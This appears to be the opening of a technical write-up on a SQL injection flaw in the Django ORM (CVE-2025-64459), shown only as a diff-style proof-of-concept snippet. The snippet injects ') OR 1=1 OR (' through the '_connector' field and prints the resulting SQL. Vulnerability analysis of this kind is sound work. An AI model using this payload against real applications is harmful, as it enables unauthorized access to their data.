Technical Write-up: SQL Injection in Django ORM CVE-2025-64459

 "username": "nonexistent_user",

-"_connector": ") OR 1=1 OR ("
+"_connector": ") OR 1=1 OR (",

 }

-queryset = process_vulnerable_request(malicious_user_payload)
+queryset = process_vulnerable_request(payload)

-sql, params = compiler.as_sql()
+sql, params = queryset.query.get_compiler(using='default').as_sql()

 self.stdout.write("Generated SQL:")